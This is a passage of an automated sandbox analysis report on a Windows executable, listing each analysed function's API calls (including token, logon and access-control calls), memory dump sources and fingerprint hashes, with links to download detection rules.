                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1f9fca3aebd1d3dc3cfb407530e36bdd03e1988a1d5dae0befe0e502373deade
                                                                                                                                                                                                                                                                                        • Instruction ID: a68fc90af90470fa0699d2e34f66968dac9a3e359fc69ce68b6db2f73b1a0dda
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f9fca3aebd1d3dc3cfb407530e36bdd03e1988a1d5dae0befe0e502373deade
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68F0C8B36017146ED7149F28DC06B66BBA8EB44360F10812AFA19CB1D1DB75E520ABA4
                                                                                                                                                                                                                                                                                        Function 00F34FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00F3319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00F35031
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f72fe839b96fb8cbe232df29f9999ed24f63b8cf81eddcbe8de54c45f7c797ce
                                                                                                                                                                                                                                                                                        • Instruction ID: a1e7ee1e1b1ab4ebd8432d7a0d6fdfef70f775d15e6b704e5e7a3847e3c31e0b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f72fe839b96fb8cbe232df29f9999ed24f63b8cf81eddcbe8de54c45f7c797ce
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFF0B4B6911E26A7DF395B269C01B5A3B59AFC0FB0F158022B81497090DA36D80176E0
                                                                                                                                                                                                                                                                                        Function 00F33B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6c2f36b981f65ef4d592c9f9794d68cbcc156fe430d5c09de6f843940881f552
                                                                                                                                                                                                                                                                                        • Instruction ID: 2d8927ef6c085e818d3352389bea3e5cb185f354bf9675afeacbf9220452c22a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c2f36b981f65ef4d592c9f9794d68cbcc156fe430d5c09de6f843940881f552
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59E0ED22A10620A6EE20AB72AC01B5ABA48EF817B0F140121EC04960E1CB34CE40B1F1
                                                                                                                                                                                                                                                                                        Function 00F066E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 89c1b6f036d2afef0b44ce2de436b28928c138930a243c4b74c36c972cb1b5fe
                                                                                                                                                                                                                                                                                        • Instruction ID: 1f8309564a9a4d2d5c6ecc116f2ff7b099bb00f1a390af616c51d7ef34548420
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89c1b6f036d2afef0b44ce2de436b28928c138930a243c4b74c36c972cb1b5fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51F03972505712CFDB349F64E8A0816BBE4BF14329324893EE6D6C6611CB329890FF10
                                                                                                                                                                                                                                                                                        Function 00F56AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 888223a20be4d14fa3626ba970adc8cd81e1589c81cb94cc2b5862669e03a134
                                                                                                                                                                                                                                                                                        • Instruction ID: ee10c2fade931f411b9fde9ac6d70c779c37e5540fdd78774f0fb540adaf3cce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 888223a20be4d14fa3626ba970adc8cd81e1589c81cb94cc2b5862669e03a134
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CF0E572B04209AAD7208B6498057A1FBE8BB00326F50491ADAE5C3181D7BA44D8B791
                                                                                                                                                                                                                                                                                        Function 00F0684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                        • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                        • Instruction ID: de74c3f6da8e22d8c31e237f80b15fedb8a2e0598457034c04d7221c6d4b230f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF0D47650020DFBDF05DF90C941E9A7BB9FB14318F208445F9159A251C336EA21ABA1
                                                                                                                                                                                                                                                                                        Function 00F03907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F03963
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1ad462ea8c8bc927c921b775d8a9bc0269662c6a35f0617995062f7ade2696c2
                                                                                                                                                                                                                                                                                        • Instruction ID: d5e5d54be100024c9afdf5a6e8b9445bb750c3f2c9d6c4e405cc58e804b5c52e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ad462ea8c8bc927c921b775d8a9bc0269662c6a35f0617995062f7ade2696c2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8F037719153189FE792DF24DC457957BBCB701708F0000A6A644A6181D7745788DF91
                                                                                                                                                                                                                                                                                        Function 00F03A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F03A76
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b07c4be1f1eff823aedce17d7b3caf124d3a73f7e4226be3865eab31c2289318
                                                                                                                                                                                                                                                                                        • Instruction ID: 499356d8829e3cd3b1298ca5acb2284920a406ed2d4ccf86b7ea9d67376dd4d3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b07c4be1f1eff823aedce17d7b3caf124d3a73f7e4226be3865eab31c2289318
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAE0CD7290012457C7209358EC05FEA77DDDFC87A0F044071FC05D7254DD64DD80A590
                                                                                                                                                                                                                                                                                        Function 00F4071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,00F40A84,?,?,00000000,?,00F40A84,00000000,0000000C), ref: 00F40737
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 597abd568b7ff83e03b69c3445c7d4e4e25eae0957eee95323c87809eb5a9a31
                                                                                                                                                                                                                                                                                        • Instruction ID: 11cf46db7886935b0fc08120ad52432ac663fd12bdb3b576c5a0ded2aa3fe977
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 597abd568b7ff83e03b69c3445c7d4e4e25eae0957eee95323c87809eb5a9a31
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22D06C3200010DBBDF028F84DD06EDA3BAAFB48714F114000BE1856020C732E861AB94
                                                                                                                                                                                                                                                                                        Function 00F6EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 09faf9edb20dac585bbfa2d6bfe3bf2a4510043a75cc6ef71b4f30f4a3a57a04
                                                                                                                                                                                                                                                                                        • Instruction ID: ac049a2355030ee8a23964c2063975a9561d53bcab434b253560b4014f7e47f4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09faf9edb20dac585bbfa2d6bfe3bf2a4510043a75cc6ef71b4f30f4a3a57a04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76B0922984060005AD280B789A0D99933207842BB57EC1BC0E4B9850E1C33D880FB950
                                                                                                                                                                                                                                                                                        Function 00F7664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: FindFirstFileW.KERNEL32(?,?), ref: 00F6DCCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6DD1B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F6DD2C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DC54: FindClose.KERNEL32(00000000), ref: 00F6DD43
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F7666E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f6a918adbea3e19d9c5118564c0347d2db676ae29ce578617ea0c1e2dd1bc87b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9bd44d0ea74c65b0965b62bbb110bbff317456b97005fa3f4c2e5e6e6604816b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6a918adbea3e19d9c5118564c0347d2db676ae29ce578617ea0c1e2dd1bc87b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF082357006049FC710EF58D845B6EB7E5AF88360F048449F9498B392CB74BC01EB91

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 00F61B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6205A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F62087
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: GetLastError.KERNEL32 ref: 00F62097
                                                                                                                                                                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F61BD2
                                                                                                                                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F61BF4
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F61C05
                                                                                                                                                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F61C1D
                                                                                                                                                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 00F61C36
                                                                                                                                                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00F61C40
                                                                                                                                                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F61C5C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F61B48), ref: 00F61A20
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A0B: CloseHandle.KERNEL32(?,?,00F61B48), ref: 00F61A35
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                        • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                        • Opcode ID: 91d6aa190f3c17df98b3329e5f19c4534d08746203719e8359284a480dd2c69e
                                                                                                                                                                                                                                                                                        • Instruction ID: 06f8782a75ec42348ca0c9aaca7d66088bf82447921143de9cb01b64154a8848
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91d6aa190f3c17df98b3329e5f19c4534d08746203719e8359284a480dd2c69e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B81AB71D00209AFDF109FA4DC49FEE7BB8FF08314F18812AF914A61A1D7758955EB60
                                                                                                                                                                                                                                                                                        Function 00F614AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61A60
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A6C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F61A99
                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F61518
                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F6154C
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F61563
                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00F6159D
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F615B9
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F615D0
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F615D8
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F615DF
